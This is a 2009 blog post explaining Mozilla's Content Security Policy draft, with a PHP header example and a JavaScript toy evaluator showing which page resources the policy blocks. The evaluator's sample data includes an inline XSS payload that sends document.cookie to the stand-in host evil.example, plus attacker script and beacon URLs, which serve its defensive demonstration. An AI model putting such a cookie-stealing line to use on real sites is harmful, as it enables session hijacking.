Mozilla CSP, Good or Bad?


In June of this year, Mozilla announced Content Security Policy (CSP) to help prevent Cross Site Scripting (XSS) attacks; if you happened never to read the blog post, you can find it here. I admit, I am not and was not utterly thrilled by the proposal. Nevertheless, you have to acknowledge the benefits of this proposal in user land, despite the additional workload it may or may not create in supplying the appropriate headers to the web browser.

Now, that was three months ago, and the first previews of CSP are now available; you can find them here. You will find more information about previewing CSP on the demo page. Keep in mind that you will need a browser that supports CSP, or all of the tests on the CSP demo page will fail. At the moment that obviously excludes Internet Explorer, Safari and Opera.

The CSP proposal is in no way a standard, or at least not yet. I wouldn't be surprised to see widespread support among avid followers of Mozilla Firefox. For those of you who can't be bothered to try and understand what the Content Security Policy (CSP) is or what it means to you, read on and I will elaborate.

The Content Security Policy, or what you now know as CSP, is essentially just a policy that a site can optionally define on a site by site basis: a header that tells the browser which origins a page is allowed to load scripts, images, frames and other content from. Say you visit site a and site b. Site a does not have CSP enabled but site b does, and let us assume for a moment that site b is a bulletin board.

A user on site b tries to embed malicious code in a post through a Cross Site Scripting (XSS) hole on site b, code that collects the information needed to hijack your session and sends it off to a server the attacker controls. With CSP enabled on site b, the browser checks every piece of content the page asks for against site b's policy: an injected inline script does not run at all, and a script or beacon pulled from the attacker's host is not on the allowed list, so the embedded content that would collect and leak your session data is blocked by your browser before it can do anything.

Now, if you're a little more web savvy and familiar with PHP, a good example of how you can enable CSP is by sending the following header from your application. The policy allow 'self' permits every content type only from the page's own origin (same scheme, host and port), and under the draft's base restrictions it also disables inline scripts. Note that header() must be called before any output is sent.

<?php
// Send the policy before any output; allow 'self' restricts all content
// to the page's own origin and disables inline script.
header("X-Content-Security-Policy: allow 'self'");
?>
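To make the bulletin board scenario above concrete, here is an added example (my own toy model, not code from the post and not Firefox's implementation) that evaluates the 2009 Mozilla X-Content-Security-Policy draft syntax the way a supporting browser would: allow is the fallback for every content type, 'self' means the same scheme, host and port as the page, and inline script is refused outright under the draft's base restrictions. The board URL, the attacker's host evil.example and the list of embedded resources are constructed for the example. Two details are assumptions rather than taken from the draft: when neither the content-type directive nor allow is present the model falls back to 'none', and a host source written without a scheme inherits the page's scheme.

```javascript
// Toy evaluator for the 2009 Mozilla X-Content-Security-Policy draft syntax.
// Added example for this post; it models the rules, it is not Firefox code.
//
// Assumptions (not from the post or the draft text):
//  - no matching directive and no "allow"  -> treated as 'none'
//  - host source without a scheme          -> inherits the page's scheme

const DIRECTIVE_FOR_TYPE = {
  script: 'script-src', img: 'img-src', frame: 'frame-src',
  xhr: 'xhr-src', style: 'style-src', font: 'font-src', media: 'media-src',
};

const DEFAULT_PORT = { 'https:': '443', 'http:': '80' };

// "allow 'self'; img-src *" -> { allow: ["'self'"], 'img-src': ['*'] }
function parsePolicy(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources.map((s) => s.toLowerCase());
  }
  return directives;
}

function effectivePort(url) {
  return url.port || DEFAULT_PORT[url.protocol] || '';
}

// Does one source expression permit loading `target` into `page`?
function sourceMatches(source, page, target) {
  if (source === "'none'") return false;
  if (source === '*') return true;
  if (source === "'self'") {
    return target.protocol === page.protocol &&
      target.hostname === page.hostname &&
      effectivePort(target) === effectivePort(page);
  }
  // host source: [scheme://]host[:port], host may begin with "*."
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([a-z0-9.*-]+)(?::(\d+))?$/.exec(source);
  if (!m) return false; // unparseable source expression never matches
  const [, scheme, host, port] = m;
  const wantScheme = scheme ? `${scheme}:` : page.protocol; // assumption: inherit page scheme
  if (target.protocol !== wantScheme) return false;
  const wantPort = port || DEFAULT_PORT[wantScheme] || '';
  if (effectivePort(target) !== wantPort) return false;
  if (host.startsWith('*.')) {
    const suffix = host.slice(1); // "*.example.com" -> ".example.com"
    return target.hostname.endsWith(suffix) && target.hostname.length > suffix.length;
  }
  return target.hostname === host;
}

// Decide whether one embedded resource on the page may load.
function isLoadAllowed(header, pageUrl, embed) {
  if (embed.inline) return false; // base restriction: inline script never runs under a policy
  const policy = parsePolicy(header);
  const sources = policy[DIRECTIVE_FOR_TYPE[embed.type]] || policy.allow || ["'none'"];
  const page = new URL(pageUrl);
  const target = new URL(embed.src);
  return sources.some((s) => sourceMatches(s, page, target));
}

// Walk every embed on a page and report what the browser would do with it.
function evaluatePage(header, pageUrl, embeds) {
  return embeds.map((e) => ({ ...e, allowed: isLoadAllowed(header, pageUrl, e) }));
}

// Constructed scenario: the bulletin board ("site b") serving the policy from
// the PHP snippet, with an attacker's post injected into the thread.
const BOARD = 'https://board.example/thread.php?id=7';
const POLICY = "allow 'self'";
const EMBEDS = [
  { type: 'script', src: 'https://board.example/js/board.js' },          // the board's own script
  { type: 'script', inline: true,                                          // injected inline script
    code: "new Image().src='http://evil.example/?c='+document.cookie" },
  { type: 'script', src: 'http://evil.example/steal.js' },                 // injected external script
  { type: 'img', src: 'http://evil.example/track.gif?c=stolen' },          // injected beacon
];

for (const v of evaluatePage(POLICY, BOARD, EMBEDS)) {
  console.log(`${v.allowed ? 'ALLOW' : 'BLOCK'} ${v.type} ${v.inline ? '(inline)' : v.src}`);
}
```

Run with node: only the board's own script is allowed; the inline payload, the attacker's script and the beacon image are all blocked. Loosening the policy to "allow 'self'; img-src *" would let the beacon through again, which is the kind of trade-off you make when you write these headers for a site that hotlinks images.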

For more information on using the Content Security Policy specification you can look no further than the Mozilla wiki: https://wiki.mozilla.org/Security/CSP/Spec#Formal_Policy_Syntax

Posted on Tuesday, October 6th, 2009 at 11:33am under Category by admin.
